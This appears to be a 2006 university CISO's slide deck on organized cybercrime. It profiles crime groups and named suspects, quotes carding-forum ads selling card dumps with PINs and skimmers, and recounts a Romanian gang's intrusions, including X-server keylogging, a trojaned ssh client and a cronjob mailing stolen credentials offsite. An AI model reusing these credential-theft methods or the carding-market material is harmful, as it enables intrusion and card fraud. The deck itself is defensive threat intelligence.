Agora A NETWORK OF TRUST THREAT BRIEFING: ORGANIZED CYBERCRIME KIRK BAILEY, CISSP, CISM CHIEF INFORMATION SECURITY OFFICER UNIVERSITY OF WASHINGTON
Agora A NETWORK OF TRUST THE NEED FOR INTELLIGENCE TO DO THE JOB RIGHT AS TECHNOLOGY SECURITY PROFFESIONALS, WE NEED TO KNOW WHO IS BEHIND ALL THE FRUSTRATING, MISERABLE AND HARMFUL STUFF…AND WHY? “In the world of networked computers every sociopath is you neighbor.” - Dan Geer, Chief Scientist , Verdasys
Agora A NETWORK OF TRUST OPEN SOURCE
Agora A NETWORK OF TRUST LAW ENFORCEMENT AND “CULTIVATED” CONTACTS White Papers & Reports
THE OLD WORLD OF ORGANIZED CRIME (CIRCA 1995) 6 8 7 3 4 1 5 2 1) CHINA(Including Hong Kong and Taiwan): The six triads also active within overseas Chinese communities. Engaged in drug trafficking, smuggling of illegal immigrants, arms dealing, vehicle theft, usury, illegal gambling, prostitution, pornography, pirating of CDs, movies, and computer software. 2) COLUMBIA: The Medellin and Cali cartels. Engaged in the production and trafficking of cocaine and heroin and political corruption. 3) ITALY: The Sicilian Mafia or Cosa Nostra, the Calabrians, the Neapolitan Camorra, and the Sacra Corona Unita of Puglia. Also active in the Balkans, France, North and South America, Turkey, and Thailand. About 350 “families” engaged in drug trafficking and virtually all crimes. 4) JAPAN:The Yakuza or Boryokudan. Also active in Korea, Hawaii, California, and Australia. Engaged in drug trafficking, extortion, financial fraud, arms dealing, illegal gambling and usury. 5) MEXICO: The Juarez, Tijuana and Gulf cartels. Also active in the Southwest US. Engaged in drug trafficking, smuggling and corruption. 6) RUSSIA: The Russian and Caucasian Mafioso. Also active in Europe and North America. About 100 groups engaged in all crimes and political corruption. 7) TURKEY: About a dozen clans. Also active in Europe and Central Asia. Engaged in heroin production and trafficking and extortion 8) UNITED STATES and CANADA:The American Mafia or Cosa Nostra - 25 families in all types of crime and trade union corruption.
PROFILE OF TRADITIONAL ORGANIZED CRIME [STRUCTURE][IDENTITY][ACTIVITIES] [USE OF CORRUPTION] [LEVEL OF TRANSBORDER OPERATIONS] [SIZE] [LEVEL OF VIOLENCE] [PENETRATION INTO LEGITIMATE ECONOMY] [POLITICAL INFLUENCE] [COOPERATION WITH PEERS]
2004 TRADITIONAL ORGAINZED CRIME ESTIMATED ANNUAL DRUG –RELATED PROFITS: $105,000,000,000 (The U.S. Department of Treasury, Office of Technical Assistance And UN’s Office of Drugs and Crime)
FRUSTRATING PROFILE OF ORGANIZED CYBERCRIME [STRUCTURE]AMORPHOUS IN THEELECTRONIC ETHER. [IDENTITY]ANONYMOUS, ASSUMED, GUISED, AND/OR ENCRYPTED. [SIZE]UNKNOWN, BUT GROWING FAST - MILLIONS AND MILLIONS OF MACHINES. [ACTIVITIES] FINANCIAL FRAUD, EXTORSION,IDENTITY THEFT,INFORMATION ESPIONAGE, AND COMPUTING AND BANDWIDTH THEFT. [USE OF CORRUPTION] FINDS PROTECTION IN “SAFE HARBOR” NATIONS AND LACK OF USEFUL INTERNATIONAL LAW, AND SOME EVIDENCE OF BRIBES AND PAYOFFS. [LEVEL OF TRANSBORDER OPERATIONS] VERY HIGH BY DESIGN. [LEVEL OF VIOLENCE] LITTLE, IF ANY. [PENETRATION INTO LEGITIMATE ECONOMY] LITTLE. [POLITICAL INFLUENCE] LITTLE. [COOPERATION WITH PEERS]VERY HIGH.
CYBER ATTACK SOPHISTICATIONEVOLVING RAPIDLY Highly advanced and well financed tools and methods bots Cross site scripting High Tools “stealth” / advanced scanning techniques Intruder Knowledge Stagedattack packet spoofing denial of service distributed attack tools sniffers sweepers www attacks automated probes/scans GUI back doors network mgmt. diagnostics disabling audits hijacking sessions burglaries exploiting known vulnerabilities password cracking Attack Sophistication self-replicating code Attackers Technical Skills password guessing Low 1980 2000+ 1985 1990 1995 Source: CERT 2004
Agora A NETWORK OF TRUST RAPIDLY GROWING THREAT SPECTRUM SERIOUS CRIMINALS ARE TAKING CONTROL OF BOTNETS AROUND THE WORLD AND IMPROVING HOW THEY COVER THEIR TRACKS AND FOIL INVESTIGATIONS. CRIMINAL OPERATIONS ARE ACTIVELY FINANCING AND WORKING TO CONTROL MALWARE DEVELOPMENT. THE NEW CRIMINAL ACTIVITIES AND INVESTMENTS ARE PRODUCING “CRIMEWARE” WITH BETTER TARGETING, PAYLOAD, AND DELIVERY SYSTEMS. IT ALL MEANS THAT “ZERO DAY” EXPLOITS ARE MORE LIKELY WITH EVEN WORSE IMPLICATIONS THAN IMAGINED BEFORE… “ALMOST INVISIBILE”
Agora INFORMATION THEFT & SALES CREDIT FRAUD ELECTRONIC THEFT & FRAUD “CRIMEWARE” MALICIOUS CODE TECHNICAL EXPLOITS BOTNETS SPAM SOCIAL ENGINEERING STOCK FRAUD & SHARE MANIPULATION A NETWORK OF TRUST FEE SCAMS ELECTRONIC EXTORTION (DDOS) ID THEFT WHAT ARE THEY DOING? = TRADITIONAL ORGANIZED CRIME = ORGANIZED CYBER-CRIME PORN CHILD PORN SLAVERY PROSTITUTION HUMAN TRAFFICKING ILLEGAL DRUGS TERRORISM? HEROIN PRESCRIPTION DRUGS EXTORTION ILLEGAL ARMS DEALING COCAINE MARIJUANA METH MONEY LAUNDERING & MOVEMENT INDUSTRIAL ESPIONAGE SOFTWARE PIRACY
GROWING GLOBAL NETWORKS OF ORGANIZED CRIME
“Shtirlitz” CASH-OUT SCHEMER Runs organized cash out schemes associated with $30 - $90 million annual fraud losses against American credit card holders. Agora Agora A NETWORK OF TRUST A NETWORK OF TRUST Leo Kuvayev a.k.a. “BadCow” SPAMMER 34-year-old Russian native whose criminal enterprise includes what is considered one of the world’s largest spamming operations. Living in U.S. until 5/11/05… now believed to be back in Russia. His estimated annual earnings are $30 million. Roman Khoda “My0” DANGEROUS ATTACKER Low-profile key player in building stealth capability for compromising systems for credit card information theft. A 26-year old Russian with a degree in physics, My0 is considered a master of target reconnaissance. He orchestrates very well organized attacks with the objective of not being detected. He once rented apartments in Malta as a temporary base of operations for attacking just one target. Universities are a favorite target. $? – but large. Russians are the leaders of the organized cyber-crime’s illicit website infrastructure for communications and markets. Closely associated with the following examples: ‘darkmarket.org’ ‘theftservices.com’ ‘carderplanet.com’ ‘vendersname.ws’ ‘cardingworld.cc’
SAMPLING THE BLACK MARKET… http://www.simplymexico.com/forums/read.php?12,56589, 56779 http://www.webmasterforum.cc/forumdisplay.php?f=30 http://hackcrew.16.forumer.com/viewforum.php?f=12&sid= fd3822fbc5e8817a48629f2973cba3f4 http://www.forumsoftware.ca/viewForum.jsp?forum=7 http://www.atarihq.com/cgi-bin/cgf_showmsg.pl?2627 http://www.forumsoftware.ca/viewThread.jsp?forum= 7&thread=8416 http://hackcrew.16.forumer.com/viewforum.php?f=6&sid= 8974fcf893613cb89b52d61f78e5762e
SAMPLING THE BLACK MARKET… DUMPS WITH PIN FOR SALE We sell dumps + pin info. All dumps skimmed, you receive info in the following format: 4024212000614532=07041011103016103181 B4024212000614532^WOODWARD/MERRITT; PIN=9021 At now in stock we have only USA dumps + pin. If PIN invalid – we replace info. We don’t give dumps for test. You receive your dumps only after payment. price for 1 dump = $300 Minimal order information: e-gold payments: $300 Western Union payments: $300 Contact information: icq 258-799 Email: firstname.lastname@example.org We don’t sell atm skimmers! At now we have no europe dumps with pin.
http://www.ladyada.net/forums/viewtopic.php?p=6876&sid=59ea89a324df220b2ef330c59beceae1http://www.ladyada.net/forums/viewtopic.php?p=6876&sid=59ea89a324df220b2ef330c59beceae1 ~ ladyada's tea party ~ Forum Index -> General Good Day to everyone who is in the same business as me Just found your forum and i think i have quite a good service to offer if people are interested im working only with serious people please do not waste my and your time if you not interested. Selling Skimmers selling skimmers for any banks in Europe and Usa, all of the skimmers are home made tested in UK and USAcost of 1 skimmers 4000$ USA dollars, I have photos and examples to show if you interested leave your e-mail Selling Dumps + pin Selling Dump+pin all of the dumps are getting checked for validaty before i sell them. If there is something wrong with the dump i will replace it with no questions. minimum order 5 dump+pin5-10 Dump+pin = 300$ each Also i have T1 tracks but without pins, some of them are with T2 but no pins, i sell them for 1-50 = 50$ each 50-100 = 35$ More then 100 contac me here or icq 194-8-194 or email@example.com me with any questions as well i will answer all your questions Payment can be made by Western Union or dump+pin or egold or WM Many Thanks looking forward doing business with serious people
Agora A NETWORK OF TRUST Dimitry Ivanovich Golubov 22-year-old Ukrainian “His international ring is making millions trafficking in millions of stolen credit cards and financial information.” - U.S. Postal Inspection Service
Prime Minister Yulia Tymoshenko January 2006 Two senior Ukrainian politicians including Vladimir Demekhin, Deputy Chairman of the Energy Committee of the Ukrainian Parliament, vouched for Golubov’s character in court. Golubov was released on bond on personal recognizance. Indications in monitored “carding community chat” suggest Golubov is back in business. Evgenia Sean Carr THE TYMOSHENKO CONNECTION?
Agora A NETWORK OF TRUST Romanians are into online extortion…big time. In 2004 Romanian gangs successfully extorted an estimated $85 millionfrom multiple online gambling sites outside of the U.S. in just 3 months-time. 2004 begin to tire of paying $200-$300 an hour to Botnet operators and begin to create their own. (This contributes significantly to the rapid growth of criminal- funded malicious code…“crimeware.”) 2005 Romanians learn from the success of the some of the Russian phishing groups and get into the business. They now have a significant share of the action…including credit card cash out schemes. 2005 estimated annual revenues: $2 - $5 billion 2006 estimated annual revenues: $10 - $15 billion ROMANIANS HAVE HAD A HISTORY OF NOT COLLABORATING MUCH WITH OTHERS OUTSIDE OF ROMANIA. THERE ARE SOME INDICATIONS THAT A COUPLE OF ROMANIAN GANGS HAVE WORKED WITH CODERS FROM SWITZERLAND AND U.S.
ROMANIAN CRIME GANG ATTACKS HIGHER EDUCATION
UW INCIDENT HISTORY (page 1) 2/23/06 -Detective Mark Kelly of San Diego CATCH Team contacts University of Washington with information about several compromised UW unix systems. Kelly’s source: a sniffer log found on a compromised machine belonging to a company called “Expedient” with HQ offices and Data Center in Pittsburg, PA. (Regional offices around the country – including offices in San Francisco). It sells high speed IP backbone infrastructure. Sniffer log was organized into several individual files which were named after IP addresses belonging to the UW. Log files showed what appeared to be the result of keystrokes captured from an x-windows session.
UW INCIDENT HISTORY (page 2) Owners/administrators of the identified IP addresses were contacted to resolve the x-window exposure. Devices were located in the Computer Science Department, Mathematics Department, and Applied Physics Laboratory. 2/28/06 - UW Security contacted by Gabe Laurence a staff member of firstname.lastname@example.org. He is working with S.D. Catch Team investigating string of attacks on UCSD systems (over 50 systems involved to date). Says they have identified a group of Romanians as being responsible. Alerted UW to threat specifics in case UW wanted to take additional steps in dealing with their response efforts. The UCSD systems compromised after attackers scanned for open x-servers and then attached to the x servers to listen for keystrokes (used old tools like “xspy”).
UW INCIDENT HISTORY (page 3) Once they obtained user/password pairs, Romanians would sometimes use that information to proliferate their access to UCSD network hosted systems. Romanians’ toolbox inventory for system compromise includes: - psybnc (IRC proxy for UNIX systems) - Mech bot (IRC bot kit) UW incident response follow-up with APL provides evidence of same activity on UW compromised systems. Examination of a tar backup of one filesystem in APL shows intruder downloads from 126.96.36.199 included files ‘a.tgz’ and ‘new.zip.gz’. ‘a.tgz’ contained psybnc and Mech bot. ‘new.zip.gz’ contained files for an Ebay phishing site that routed phish hits to ‘email@example.com.’ Additionally, the trojaned ssh client used in the downloads wrote usernames and passwords to /usr/lib/+c0d.init. A daily cronjob mailed off the results of dsniff and the +c0d.init file to Taz_mania@email.ro.
UW INCIDENT HISTORY (page 4) • System Administrator for UW APL had already wiped and reinstalled • operating systems but tar backup of one of the systems yielded • additional evidence of interest: • - First intrusion appears to have been on 12/29/05 with • root level access lasting up until 1/08/06. • - Logs show root access from the following sources: • Jan 8 08:51 - 188.8.131.52 (No DNS, Romanian, rdsnet.ro) • Jan 8 08:37 - 184.108.40.206 (No DNS, Romanian, rdsnet.ro) • Jan 8 08:07 - 220.127.116.11 (No DNS, Romanian,rdsnet.ro) • Jan 8 00:25 - 18.104.22.168 (No DNS, Romanian, rdsnet.ro) • Jan 7 04:29 - 22.214.171.124 (85_186_16_189.dbisoft.dnttm.ro) • Jan 7 04:11 - 126.96.36.199 (85_186_16_189.dbisoft.dnttm.ro) • Jan 4 05:13 - 188.8.131.52 (lily.earth.sinica.edu.tw) • Dec 29 04:36 - 184.108.40.206 (haydn.bio.sunysb.edu) • Dec 29 04:16 - 220.127.116.11 (bonnet.bio.sunysb.edu) • Dec 29 04:14 - 18.104.22.168 (donau.cs.upb.de)
UW INCIDENT HISTORY (page 5) 3/3/06 - UW Security receives reports that machines in the UW Mathematics Department are scanning outside networks. UW department system administrators notified and systems were scrubbed, patched, and brought back online. In looking at the machines it was clear that ‘xspy’ had been installed on them to keystroke log other machines. 4/19/06 – UW Security is again contacted by Detective Mark Kelly of S.D. CATCH Team. He forwards a copy of a computer file, discovered on a computer located on the UCLA network, that shows keystroke logging of a UW Medicine computer. He informs UW Security that the file is associated with the same Romanian cyber-gang. UW Medicine machine is hosting a vender controlled system that cannot be patched or modified by UW system administrators. It is isolated from the network.
UW INCIDENT HISTORY (page 6) UW technicians obtain image of system for forensic review. The complete and lengthy forensic review produces no evidence of any kind of any compromise. UW CISO begins conversations with law enforcement officials starting with Detective Kelly in S.D. to learn more about the threat. Requests for copies of any investigative reports or notes are denied by law enforcement because of status of case. Information from identified victim institutions is very difficult to obtain. Compromised systems are used by the gang in the several different ways which reveals how they are making money and glimpses at how fast they are evolving. Machines are used as - x windows keystroke logging and related file storage - bot in DDOS attacks - bot for spamming - platform for scanning and compromising other systems - host for counterfeit websites in phishing operations.
UW INCIDENT HISTORY (page 7) UW CISO learns the following from a limited number of sources involved in related investigations: 1) This particular Romanian cyber-crime gang has been the subject of ongoing federal and international investigations for over 2 years. 2) Since 2004, there have been at least 3 separate FBI investigations initiated out of California, Utah, and Illinois. 3) The leading expert on the Romanian’s activities is a recently retired FBI agent in Illinois…Craig Adams. 4) Requests to make this be designated as a major crime for more resources and higher priority have not been successful to date. 5) They are one of the most successful Romanian cyber gangs known (“huge amounts of money”).
UW INCIDENT HISTORY (page 8) 6) The Romanians are known to have compromised hundreds of networks and systems all over the world including at least 50 institutions of higher education: Rutgers University of Southern California University of California San Diego University of California Los Angeles University of California Berkeley Stanford California Polytechnic State University Florida State University Boston University Purdue Carnegie Mellon University University of Chicago Penn State Syracuse University University of Oregon Louisiana State University University of Colorado University of Missouri Missouri State University University of Illinois University of Delaware University of Texas Ohio University Ohio State University University of Kansas University of Iowa Rice Utah State University Harvard
UW INCIDENT HISTORY (page 9) 7) In addition, Detective Kelly stated that he knew of at least a hundred other university systems overseas that have been compromised by the same gang. He knew this because he has contacted all of them with sniffer file evidence like he delivered to the UW (All his evidence comes from the S.D. CATCH Team investigation of an initial compromise on the UCSD network). 8) Romanians targets are not limited to higher education. Other compromised organizations include NASA, JPL, Goddard Space Flight Center, and dozens of businesses large and small. The list is long. 9) Many of the institutions that have contacted have not responded or didn’t seem to be interested when notified.
UW INCIDENT HISTORY (page 10) • 10 ) Investigators indicate that the Romanians are constantly evolving • their methods and scope of botnet operations. • A worrisome addition to their methods is their limited adoption and • “testing” of TOR technology. Law enforcement says the gang has • used TOR Onion Routers in operations at Harvard and Ohio University. • 11) Firewalls at UW Medicine continue to show attempts to • communicate with it by machines from around the world: • - Universitaet Bremen, Germany • - Nantong Medicinal University, Jiangsu Province, China • - University of Notre Dame
ATTACK VECTOR NUMBERS AND OTHER WORRISOME FACTS. 2,200,000- UW’s CURRENT DAILY AVERAGE OF INCOMING SPAM EMAIL BLOCKED OR HANDLED. THIS REPRESENTS APPROXIMATELY 75% OF ALL INCOMING EMAIL PROCESSED THROUGH CENTRAL EMAIL SERVICES. 1,000,000 - UW’s currentcurrent daily average of incoming emails detected with imbedded malicious code. (source: C&C managed email filtering services) 180,000- UW’s current daily average of detected and blocked attacks targeted at the UW coming from locations all around the world. (source: TippingPoint filters). 10 -120 MINUTES - TIME FOR AN UNPROTECTED MACHINE TO BE COMPROMIZED ON UW BACKBONE
Agora A NETWORK OF TRUST INDICATIONS OF HOW BAD THINGS ARE IN GENERAL: ORGANIZED CYBERCRIME MAKES MORE MONEY OFF OF DATA THAN ORGANIZED CRIME MADE FROM DRUGS - $300 BILLION IN 2006? $175 BILLION- ESTIMATED TOTAL REVENUE FOR E-COMMERCE WORLD-WIDE IN 2006 (Direct Marketing Association)
INDICATIONS OF HOW BAD: 80% OF WEB APPLICATIONS ARE VULNERABLE TO ATTACKS (WhiteHat Security, Inc.) AVERAGE COMPUTER ON THE INTERNET IS ATTACKED EVERY 39 SECONDS - 2,244 TIMES A DAY (University of Maryland research) 80% OF HOME COMPUTERS ARE COMPROMISED WITH SPYWARE AND… (WhiteHat Security, Inc.) 7% OF COMPROMISED HOME COMPUTERS ARE BEING REMOTELY CONTROLLED AS PART OF A CRIMINAL BOTNET OPERATION. (WhiteHat Security, Inc.)
Agora A NETWORK OF TRUST WE NEED GOOD INTELLIGENCE ABOUT OUR ADVERSARIES TO BUILD EFFECTIVE SECURITY STRATEGIES. PARTNERSHIPS AND SHARING INFORMATION HAS NEVER BEENMORE IMPORTANT. THE IMMEDIATE FUTURE OF SECURITY IS LESS ABOUT TECHNOLOGY SOLUTIONS AND MORE ABOUT PEOPLE AND BEING STREET SMART AND FAST ON YOUR FEET. IF YOU THINK THE GOOD GUYS ARE GOING TO EVENTUALLY WIN THE TECHNOLOGY ARMS RACE, THINK AGAIN.
Agora A NETWORK OF TRUST THE ADVERSARY IS EVOLVING STRATEGIES AND TACTICS THAT ARE BECOMING MORE EFFECTIVE AND STEALTH. THEIR INCURRSIONS ARE BECOMING ALMOST PARASITIC IN NATURE. ARE WESTERN BUSINESS AND GOVERNMENT NETWORKS UNWITTINGLY BEING MERGED WITH CRIMINAL NETWORK OPERATIONS? WOULD THIS REPRESENT OPPORTUNITIES FOR NEW INFORMATION ASSURANCE PRACTICES? DOES THE DATA ITSELF HAVE OPPORTUNITIES FOR EFFECTIVE DEFENSIVE MEASURES? SHOULDN’T WE BE WORKING ON OFFENSIVE ATTACK TOOLS LIKE THE CYBER-CRIMINALS ARE BUILDING TO MAYBE STAY AHEAD OF THEM?
Agora A NETWORK OF TRUST THANK YOU